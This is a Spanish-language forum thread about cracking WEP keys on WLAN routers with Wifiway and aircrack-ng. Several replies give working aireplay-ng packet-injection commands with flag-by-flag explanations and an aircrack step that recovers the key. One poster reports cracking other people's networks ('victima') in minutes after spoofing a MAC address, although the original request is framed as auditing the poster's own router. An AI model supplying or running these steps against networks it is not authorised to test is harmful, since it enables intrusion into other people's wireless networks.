nuevas wlanXXXXX. como descifrarlas con wifiway

Iniciado por vsx187, 6 Mayo 2010, 21:47 PM

0 Miembros y 1 Visitante están viendo este tema.

vsx187

Hola a tod@s!!!
Soy nuevo en este foro, y practicamente en este mundo..
Uso wifiway para realizar mi propia auditoria de mi router. antes era de timofonica, con un wlan_XX y me resultaba superfacilismo... ahora ya me cambiado a yacom.. tengo router wlanXXXXX y no tengo manera de sacar la auditoria..alguien puede ayudarme???lo agradeceria muxo...saludos y gracias de antemano

Delt_hack

Hola vsx187 si se nota q eres nuevo por q creo q este post no va en este foro, esto va en el foro de wireles asi q la proxima postealo alla para poder ayudarte...

saludos...
Se dice que solo diez personas en todo el mundo entendían a Einstein. Si nadie me entiende a mi, ¿soy un genio?

heaviloto

hola,

esta claro que con wlandwcrypter, si es lo que esta usando no lo conseguiras, pero por linea de comandos no es muy dificil, ¿cuales son los pasos que sigues?

un saludo
larga vida al rock&roll
heaviloto

Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)


maveeeeeee


Interesante.

Yo mañana probaré el método de heaviloto y os comento.


Cita de: heaviloto en 27 Diciembre 2008, 23:13 PM
hola, acabo de sacar otra WLAN_XXXXXX, sin cliente me e asociado y e atacado con

-. aireplay-ng  -2  -p  0841  -c  ff:ff:ff:ff:ff:ff  -b ( bssid del AP)  -h  (nuestra bssid o conectada ) wlan0 
y hala a capturar ARP, luego con,

-. aircrack  (nombre inventado del archivo)-01.cap

y ya esta, key found

un saludo

PD: dudux, te la mando por privado
Why listen that music if you can enjoy really good bass?

maveeeeeee

Bueno, ya he probado el método que comenta heaviloto, y la verdad es que he crackeado wifis que no podia crakear durante horas y horas en 5 minutos.

EXITAZO !!!

Simplemente (con Wifiway) tenéis que ejecutar airoscript, escanear, seleccionar victima, ataque modo 1 (interactivo), y luego en una consola aparte, luego de haberle puesto una MAC fake a vuestra wifi, ponéis esto:

Citaraireplay-ng  -2  -p  0841  -c  ff:ff:ff:ff:ff:ff  -b ( bssid del AP)  -h  (nuestra bssid o conectada ) wlan0
Why listen that music if you can enjoy really good bass?

Garcad

#6
aireplay-ng -F -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b MAC_del_punto_de_acceso_(BSSID) -h MAC_de_tu_tarjeta_ wireless -x ratio_inyección <dispositivo_monitor>

-f fromds : frame control, From DS bit
-2 Ataque 2: Selección interactiva del paquete a enviar
-p 0841 fija el "Frame Control" para que parezca que el paquete se está enviando desde un cliente wireless.
-c dmac : fijar dirección MAC de destino en este caso Broadcast
-b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso (BSSID). Este es un filtro para seleccionar un AP.
-h smac : fijar dirección MAC origen, es la dirección MAC de los paquetes que se están transmitiendo, que debe coincidir con la MAC de tu tarjeta wireless.
-x nbpps : número de paquetes por segundo
<dispositivo_monitor> : Nombre de la interface wireless.

http://www.aircrack-ng.org/doku.php?id=es:interactive_packet_replay
http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

Salu2